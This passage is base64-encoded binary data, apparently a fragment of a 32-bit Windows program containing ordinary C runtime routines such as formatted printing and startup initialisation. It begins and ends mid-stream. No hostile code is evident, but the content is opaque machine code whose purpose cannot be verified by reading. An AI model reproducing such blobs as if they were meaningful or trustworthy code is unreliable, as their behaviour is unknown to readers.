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DwwSJneT7//+LW/yJnfT7//+F2w+N5ggAAION9Pv////p2ggAAIuF9Pv//2vACg+3yo1ECNCJhfT7///pvwgAAA+3woP4SXRXg/hodEaD+Gx0GIP4dw+FpAgAAIGN+Pv//wAIAADplQgAAGaDPmx1FwP3gY34+///ABAAAIm1wPv//+l4CAAAg434+///EOlsCAAAg434+///IOlgCAAAD7cGZoP4NnUfZoN+AjR1GIPGBIGN+Pv//wCAAACJtcD7///pOAgAAGaD+DN1H2aDfgIydRiDxgSBpfj7////f///ibXA+///6RMIAABmg/hkD4QJCAAAZoP4aQ+E/wcAAGaD+G8PhPUHAABmg/h1D4TrBwAAZoP4eA+E4QcAAGaD+FgPhNcHAACDpaT7//8Ai4XQ+///Uo214Pv//8eF2Pv//wEAAADo+/v//+muBwAAD7fCg/hkD48vAgAAD4TAAgAAg/hTD48bAQAAdH6D6EF0ECvHdFkrx3QIK8cPhe8FAACDwiDHhaD7//8BAAAAiZXo+///g434+///QIO99Pv//wCNtfz7//+4AAIAAIm18Pv//4mF7Pv//w+NkAIAAMeF9Pv//wYAAADp7AIAAPeF+Pv//zAIAAAPhcgAAACDjfj7//8g6bwAAAD3hfj7//8wCAAAdQeDjfj7//8gi730+///g///dQW/////f4PDBPaF+Pv//yCJneT7//+LW/yJnfD7//8PhAgFAACF23ULoSBdARCJhfD7//+Dpez7//8Ai7Xw+///hf8PjiAFAACKBoTAD4QWBQAAjY2o+///D7bAUVDoCNf//1lZhcB0AUZG/4Xs+///Ob3s+///fNDp6wQAAIPoWA+E9wIAACvHD4SUAAAAK8EPhPb+//8rxw+FygQAAA+3A4PDBDP2RvaF+Pv//yCJtdj7//+JneT7//+JhZz7//90QoiFzPv//42FqPv//1CLhaj7///Ghc37//8A/7CsAAAAjYXM+///UI2F/Pv//1DoR1AAAIPEEIXAfQ+JtcT7///rB2aJhfz7//+Nhfz7//+JhfD7//+Jtez7///pRgQAAIsDg8MEiZ3k+///hcB0OotIBIXJdDP3hfj7//8ACAAAD78AiY3w+///dBKZK8LHhdj7//8BAAAA6QEEAACDpdj7//8A6fcDAAChIF0BEImF8Pv//1DokzEAAFnp4AMAAIP4cA+P+gEAAA+E4gEAAIP4ZQ+MzgMAAIP4Zw+O6f3//4P4aXRxg/hudCiD+G8PhbIDAAD2hfj7//+Ax4Xo+///CAAAAHRhgY34+///AAIAAOtVizODwwSJneT7///oQU8AAIXAD4QwBQAA9oX4+///IHQMZouF4Pv//2aJBusIi4Xg+///iQbHhcT7//8BAAAA6cEEAACDjfj7//9Ax4Xo+///CgAAAPeF+Pv//wCAAAAPhKsBAACLA4tTBIPDCOnnAQAAdRJmg/pndWPHhfT7//8BAAAA61c5hfT7//9+BomF9Pv//4G99Pv//6MAAAB+PYu99Pv//4HHXQEAAFfomBAAAIuV6Pv//1mJhbz7//+FwHQQiYXw+///ib3s+///i/DrCseF9Pv//6MAAACLA4PDCImFlPv//4tD/ImFmPv//42FqPv//1D/taD7//8PvsL/tfT7//+JneT7//9Q/7Xs+///jYWU+///VlD/NUBdARDoTfD//1n/0Iud+Pv//4PEHIHjgAAAAHQhg730+///AHUYjYWo+///UFb/NUxdARDoHfD//1n/0FlZZoO96Pv//2d1HIXbdRiNhaj7//9QVv81SF0BEOj37///Wf/QWVmAPi11EYGN+Pv//wABAABGibXw+///VukE/v//x4X0+///CAAAAImNuPv//+skg+hzD4Rn/P//K8cPhIr+//+D6AMPhckBAADHhbj7//8nAAAA9oX4+///gMeF6Pv//xAAAAAPhGr+//9qMFhmiYXI+///i4W4+///g8BRZomFyvv//4m93Pv//+lF/v//94X4+///ABAAAA+FRf7//4PDBPaF+Pv//yB0HPaF+Pv//0CJneT7//90Bg+/Q/zrBA+3Q/yZ6xf2hfj7//9Ai0P8dAOZ6wIz0omd5Pv///aF+Pv//0B0G4XSfxd8BIXAcxH32IPSAPfagY34+///AAEAAPeF+Pv//wCQAACL2ov4dQIz24O99Pv//wB9DMeF9Pv//wEAAADrGoOl+Pv///e4AAIAADmF9Pv//34GiYX0+///i8cLw3UGIYXc+///jbX7/f//i4X0+////430+///hcB/BovHC8N0LYuF6Pv//5lSUFNX6J5NAACDwTCD+TmJnZD7//+L+IvafgYDjbj7//+IDk7rvY2F+/3//yvGRveF+Pv//wACAACJhez7//+JtfD7//90WYXAdAeLzoA5MHRO/43w+///i43w+///xgEwQOs2hdt1C6EkXQEQiYXw+///i4Xw+///x4XY+///AQAAAOsJT2aDOAB0BkBAhf918yuF8Pv//9H4iYXs+///g73E+///AA+FZQEAAIuF+Pv//6hAdCupAAEAAHQEai3rDqgBdARqK+sGqAJ0FGogWGaJhcj7///Hhdz7//8BAAAAi53U+///i7Xs+///K94rndz7///2hfj7//8MdRf/tdD7//+NheD7//9TaiDokfX//4PEDP+13Pv//4u90Pv//42F4Pv//42NyPv//+iY9f//9oX4+///CFl0G/aF+Pv//wR1EldTajCNheD7///oT/X//4PEDIO92Pv//wB1dYX2fnGLvfD7//+Jtej7////jej7//+Nhaj7//9Qi4Wo+////7CsAAAAjYWc+///V1Do3UoAAIPEEImFkPv//4XAfin/tZz7//+LhdD7//+NteD7///ouvT//wO9kPv//4O96Pv//wBZf6brHION4Pv////rE4uN8Pv//1aNheD7///o4/T//1mDveD7//8AfCD2hfj7//8EdBf/tdD7//+NheD7//9TaiDolfT//4PEDIO9vPv//wB0E/+1vPv//+hB1v//g6W8+///AFmLtcD7//8PtwaJhej7//9mhcB0KouNpPv//4ud5Pv//4vQ6Zb1///oIdz//8cAFgAAADPAUFBQUFDpMvX//4C9tPv//wB0CouFsPv//4NgcP2LheD7//+LTfxfXjPNW+hpzf//ycONSQC3ZwAQmWUAEMtlABAoZgAQdWYAEIFmABDIZgAQ2GcAEIv/VYvsgex0BAAAoRxQARAzxYlF/FOLXRRWi3UIM8BX/3UQi30MjY20+///ibXE+///iZ3o+///iYWs+///iYX4+///iYXU+///iYX0+///iYXc+///iYWw+///iYXY+///6P3O//+F9nU16FTb///HABYAAAAzwFBQUFBQ6Nra//+DxBSAvcD7//8AdAqLhbz7//+DYHD9g8j/6c8KAAAz9jv+dRLoGdv//1ZWVlbHABYAAABW68UPtw+JteD7//+Jtez7//+Jtcz7//+Jtaj7//+JjeT7//9mO84PhHQKAABqAloD+jm14Pv//4m9oPv//w+MSAoAAI1B4GaD+Fh3Dw+3wQ+2gKAUARCD4A/rAjPAi7XM+///a8AJD7aEMMAUARBqCMHoBF6Jhcz7//87xg+EM////4P4Bw+H3QkAAP8khZB7ABAzwION9Pv///+JhaT7//+JhbD7//+JhdT7//+Jhdz7//+Jhfj7//+Jhdj7///psAkAAA+3wYPoIHRIg+gDdDQrxnQkK8J0FIPoAw+FhgkAAAm1+Pv//+mHCQAAg434+///BOl7CQAAg434+///AelvCQAAgY34+///gAAAAOlgCQAACZX4+///6VUJAABmg/kqdSuLA4PDBImd6Pv//4mF1Pv//4XAD402CQAAg434+///BPed1Pv//+kkCQAAi4XU+///a8AKD7fJjUQI0ImF1Pv//+kJCQAAg6X0+///AOn9CAAAZoP5KnUliwODwwSJnej7//+JhfT7//+FwA+N3ggAAION9Pv////p0ggAAIuF9Pv//2vACg+3yY1ECNCJhfT7///ptwgAAA+3wYP4SXRRg/hodECD+Gx0GIP4dw+FnAgAAIGN+Pv//wAIAADpjQgAAGaDP2x1EQP6gY34+///ABAAAOl2CAAAg434+///EOlqCAAAg434+///IOleCAAAD7cHZoP4NnUZZoN/AjR1EoPHBIGN+Pv//wCAAADpPAgAAGaD+DN1GWaDfwIydRKDxwSBpfj7////f///6R0IAABmg/hkD4QTCAAAZoP4aQ+ECQgAAGaD+G8PhP8HAABmg/h1D4T1BwAAZoP4eA+E6wcAAGaD+FgPhOEHAACDpcz7//8Ai4XE+///UY214Pv//8eF2Pv//wEAAADoUvD//1npuAcAAA+3wYP4ZA+PMAIAAA+EvQIAAIP4Uw+PGwEAAHR+g+hBdBArwnRZK8J0CCvCD4XsBQAAg8Egx4Wk+///AQAAAImN5Pv//4ON+Pv//0CDvfT7//8AjbX8+///uAACAACJtfD7//+Jhez7//8PjY0CAADHhfT7//8GAAAA6ekCAAD3hfj7//8wCAAAD4XJAAAAg434+///IOm9AAAA94X4+///MAgAAHUHg434+///IIu99Pv//4P//3UFv////3+DwwT2hfj7//8giZ3o+///i1v8iZ3w+///D4QFBQAAhdt1C6EgXQEQiYXw+///g6Xs+///AIu18Pv//4X/D44dBQAAigaEwA+EEwUAAI2NtPv//w+2wFFQ6F7L//9ZWYXAdAFGRv+F7Pv//zm97Pv//3zQ6egEAACD6FgPhPACAAArwg+ElQAAAIPoBw+E9f7//yvCD4XGBAAAD7cDg8MEM/ZG9oX4+///IIm12Pv//4md6Pv//4mFnPv//3RCiIXI+///jYW0+///UIuFtPv//8aFyfv//wD/sKwAAACNhcj7//9QjYX8+///UOicRAAAg8QQhcB9D4m1sPv//+sHZomF/Pv//42F/Pv//4mF8Pv//4m17Pv//+lCBAAAiwODwwSJnej7//+FwHQ6i0gEhcl0M/eF+Pv//wAIAAAPvwCJjfD7//90EpkrwseF2Pv//wEAAADp/QMAAIOl2Pv//wDp8wMAAKEgXQEQiYXw+///UOjoJQAAWencAwAAg/hwD4/2AQAAD4TeAQAAg/hlD4zKAwAAg/hnD47o/f//g/hpdG2D+G50JIP4bw+FrgMAAPaF+Pv//4CJteT7//90YYGN+Pv//wACAADrVYszg8MEiZ3o+///6JpDAACFwA+EVvr///aF+Pv//yB0DGaLheD7//9miQbrCIuF4Pv//4kGx4Ww+///AQAAAOnBBAAAg434+///QMeF5Pv//woAAAD3hfj7//8AgAAAD4SrAQAAA96LQ/iLU/zp5wEAAHUSZoP5Z3Vjx4X0+///AQAAAOtXOYX0+///fgaJhfT7//+BvfT7//+jAAAAfj2LvfT7//+Bx10BAABX6PEEAABZi43k+///iYWo+///hcB0EImF8Pv//4m97Pv//4vw6wrHhfT7//+jAAAAiwODwwiJhZT7//+LQ/yJhZj7//+NhbT7//9Q/7Wk+///D77B/7X0+///iZ3o+///UP+17Pv//42FlPv//1ZQ/zVAXQEQ6Kbk//9Z/9CLnfj7//+DxByB44AAAAB0IYO99Pv//wB1GI2FtPv//1BW/zVMXQEQ6Hbk//9Z/9BZWWaDveT7//9ndRyF23UYjYW0+///UFb/NUhdARDoUOT//1n/0FlZgD4tdRGBjfj7//8AAQAARom18Pv//1bpCP7//4m19Pv//8eFrPv//wcAAADrJIPocw+Eavz//yvCD4SK/v//g+gDD4XJAQAAx4Ws+///JwAAAPaF+Pv//4DHheT7//8QAAAAD4Rq/v//ajBYZomF0Pv//4uFrPv//4PAUWaJhdL7//+Jldz7///pRf7///eF+Pv//wAQAAAPhUX+//+DwwT2hfj7//8gdBz2hfj7//9AiZ3o+///dAYPv0P86wQPt0P8mesX9oX4+///QItD/HQDmesCM9KJnej7///2hfj7//9AdBuF0n8XfASFwHMR99iD0gD32oGN+Pv//wABAAD3hfj7//8AkAAAi9qL+HUCM9uDvfT7//8AfQzHhfT7//8BAAAA6xqDpfj7///3uAACAAA5hfT7//9+BomF9Pv//4vHC8N1BiGF3Pv//421+/3//4uF9Pv///+N9Pv//4XAfwaLxwvDdC2LheT7//+ZUlBTV+j3QQAAg8Ewg/k5iZ2Q+///i/iL2n4GA42s+///iA5O672Nhfv9//8rxkb3hfj7//8AAgAAiYXs+///ibXw+///dFmFwHQHi86AOTB0Tv+N8Pv//4uN8Pv//8YBMEDrNoXbdQuhJF0BEImF8Pv//4uF8Pv//8eF2Pv//wEAAADrCU9mgzgAdAYDwoX/dfMrhfD7///R+ImF7Pv//4O9sPv//wAPhWUBAACLhfj7//+oQHQrqQABAAB0BGot6w6oAXQEaivrBqgCdBRqIFhmiYXQ+///x4Xc+///AQAAAIud1Pv//4u17Pv//yveK53c+///9oX4+///DHUX/7XE+///jYXg+///U2og6Orp//+DxAz/tdz7//+LvcT7//+NheD7//+NjdD7///o8en///aF+Pv//whZdBv2hfj7//8EdRJXU2owjYXg+///6Kjp//+DxAyDvdj7//8AdXWF9n5xi73w+///ibXk+////43k+///jYW0+///UIuFtPv///+wrAAAAI2FnPv//1dQ6DY/AACDxBCJhZD7//+FwH4p/7Wc+///i4XE+///jbXg+///6BPp//8DvZD7//+DveT7//8AWX+m6xyDjeD7////6xOLjfD7//9WjYXg+///6Dzp//9Zg73g+///AHwg9oX4+///BHQX/7XE+///jYXg+///U2og6O7o//+DxAyDvaj7//8AdBP/taj7///omsr//4OlqPv//wBZi72g+///i53o+///D7cHM/aJheT7//9mO8Z0B4vI6aH1//85tcz7//90DYO9zPv//wcPhVD1//+AvcD7//8AdAqLhbz7//+DYHD9i4Xg+///i038X14zzVvoyMH//8nDi/9gcwAQWHEAEIpxABDlcQA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